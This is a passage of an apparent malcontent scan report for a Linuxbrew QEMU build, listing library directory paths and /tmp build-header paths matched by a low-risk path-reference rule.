[/home/linuxbrew/.linuxbrew/opt/libxi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxinerama/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxinerama%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbcommon/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbcommon%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxkbfile/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxkbfile%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxml2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxml2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxmu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxmu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrandr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrandr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxrender/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxrender%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxshmfence/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxshmfence%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxtst/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxtst%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxv/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxv%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxxf86vm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxxf86vm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/llvm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fllvm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lm-sensors/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flm-sensors%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lz4/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flz4%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/lzo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flzo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa-glu/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa-glu%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mesa/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmesa%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/mpdecimal/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fmpdecimal%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/nettle/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fnettle%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/openssl](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fopenssl&type=code)
[/home/linuxbrew/.linuxbrew/opt/p11-kit/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fp11-kit%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pango/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpango%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pcre2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpcre2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/pixman/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpixman%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/python](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fpython&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/snappy/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsnappy%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-llvm-translator/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-llvm-translator%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/spirv-tools/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fspirv-tools%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/systemd/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsystemd%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/unbound/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Funbound%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/util-linux/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Futil-linux%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/valgrind/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvalgrind%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/vde/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fvde%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/wayland/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fwayland%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-image/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-image%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-keysyms/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-keysyms%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-renderutil/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-renderutil%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util-wm/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util-wm%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xcb-util/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxcb-util%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xkbcomp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxkbcomp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xorg-server/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxorg-server%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/xz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fxz%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/z3/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fz3%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/sbin/samba-dot-org-smbd](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fsbin%2Fsamba-dot-org-smbd&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/block/block-gen.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fblock%2Fblock-gen.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/hw/usb/hcd-ehci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fhw%2Fusb%2Fhcd-ehci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/base.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fbase.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/list.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flist.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/listfile.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Flistfile.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/authz/simple.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fauthz%2Fsimple.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/block/throttle-gro](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fblock%2Fthrottle-gro&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-fd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-fd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char-socke](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar-socke&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/chardev/char.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fchardev%2Fchar.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_comm](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_comm&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/secret_keyr](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Fsecret_keyr&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tls-cipher-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftls-cipher-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscreds.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscreds.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsano](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsano&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredspsk](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredspsk&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/crypto/tlscredsx50](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fcrypto%2Ftlscredsx50&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/memory_ldst_c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fmemory_ldst_c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/exec/ram_addr.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fexec%2Fram_addr.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_aml_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_aml_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/acpi_dev_i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Facpi_dev_i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/acpi/vmgenid.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Facpi%2Fvmgenid.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/block/flash.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fblock%2Fflash.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/boards.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fboards.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/char/serial.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fchar%2Fserial.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/clock.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fclock.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/cpu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fcpu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/generic-lo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fgeneric-lo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/core/resetconta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcore%2Fresetconta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/cluster.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcluster.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/cpu/core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fcpu%2Fcore.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/display/i2c-ddc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fdisplay%2Fi2c-ddc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/elf_ops.h.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Felf_ops.h.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/fw-path-provide](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Ffw-path-provide&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/hotplug.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fhotplug.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/i2c/i2c.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fi2c%2Fi2c.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
